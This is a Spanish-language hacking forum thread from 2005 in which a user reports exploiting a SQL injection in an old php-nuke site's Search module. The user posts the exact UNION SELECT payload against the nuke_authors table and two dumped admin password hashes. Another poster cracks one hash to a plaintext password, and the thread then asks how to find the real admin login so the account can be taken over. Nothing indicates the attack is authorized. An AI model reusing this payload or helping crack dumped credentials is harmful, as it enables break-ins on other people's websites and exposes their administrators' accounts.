elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
27 Mayo 2012, 15:14  


Tema destacado: Personaliza-Escoge el diseño del foro que más te guste.

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, kamsky, TRICKY)
| | | |-+  Ayuda con php-nuke
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con php-nuke  (Leído 543 veces)
Algoritmo

Desconectado Desconectado

Mensajes: 79



Ver Perfil
Ayuda con php-nuke
« en: 8 Agosto 2005, 05:51 »

Buenas... este es mi problema...

En una pagina de php-nuke (una version algo vieja, no estoy seguro de cual sea), resulta que aproveche un bug a traves de una inyeccion sql en el modulo search (muchos de ustedes deben conocer ese exploit), el cual devulve los passw en md5, he conceguido descifrar el passw. El problema es al momento de acceder  me dice que el nombre que el login no es correcto, es decir que el utiliza el el foro un nombre que no es su login (algo asi como en este foro, en el que puedes cambiar el nombre que los usuarios ven).

Alguno de ustedes sabe alguna forma de saber ese login?... puede ser un exploit o cualquier otra cosa...

aqui dejo lo que la inyeccion sql devolvio...

Citar
Resultados de la Búsqueda

a4e360681676c770121e891f8c407572
Enviado por Fulanito Menganito el Wednesday, 31 December a las 18:59:59
Adjuntar al Artículo:
(13 responde)

53c38591d4d2d7735369d3083df531b3
Enviado por vprada el Wednesday, 31 December a las 18:59:59
Adjuntar al Artículo:
(13 responde)

Esta fue la inyeccion que utilice

modules.php?name=Search&type=comments&%20%20%20query=loquesea&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors

El primero fue la clave que desencripte (el segundo estoy en ese proceso :-\), como pueden ver alli aparece como Fulanito Menganito, cuando lo coloco en el login me dice que no existe...

Puede ser que ese passw no sean ciertos y que la pagina no sea vulnerable a ese ataque?

Alguna idea, comentario o sugerencia...??

gracias

Salu2
« Última modificación: 8 Agosto 2005, 06:07 por Algoritmo » En línea
Algoritmo

Desconectado Desconectado

Mensajes: 79



Ver Perfil
Re: Ayuda con php-nuke
« Respuesta #1 en: 9 Agosto 2005, 06:46 »

Sera que huviese sido mejor si huviese puesto este tema en hacking avanzado???.... :-\
En línea
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Ayuda con php-nuke
« Respuesta #2 en: 9 Agosto 2005, 07:00 »

pase la clave por un cracker online y me salio esto:

 ID
74058346
   
hash
a4e360681676c770121e891f8c407572    
   
result
nelson
    
hex_result
hex:6e656c736f6e

fijate si te sirve

salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Algoritmo

Desconectado Desconectado

Mensajes: 79



Ver Perfil
Re: Ayuda con php-nuke
« Respuesta #3 en: 9 Agosto 2005, 07:09 »

gracias por la respuesta...

esa clave la tengo pero el login verdadero no...

quisiera saber realmente el nombre del user...

he conceguido descifrar el passw. El problema es al momento de acceder  me dice que el nombre que el login no es correcto, es decir que el utiliza el el foro un nombre que no es su login (algo asi como en este foro, en el que puedes cambiar el nombre que los usuarios ven).

PD: que cracker online es ese?
En línea
mousehack


Desconectado Desconectado

Mensajes: 1.142

Ex-Colaborador....!!!!!!XD


Ver Perfil
Re: Ayuda con php-nuke
« Respuesta #4 en: 9 Agosto 2005, 07:13 »

Citar
result
nelson

probaste con esto???? como nombre de user... :-\

Salu2
En línea



VISITEN MI BLOG PERSONAL....
http://mousehack.blogspot.com/ ...XD
Algoritmo

Desconectado Desconectado

Mensajes: 79



Ver Perfil
Re: Ayuda con php-nuke
« Respuesta #5 en: 9 Agosto 2005, 07:15 »

si... ese resultado es la clave.... xxxxD, como login no sirve :-\

salu2
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines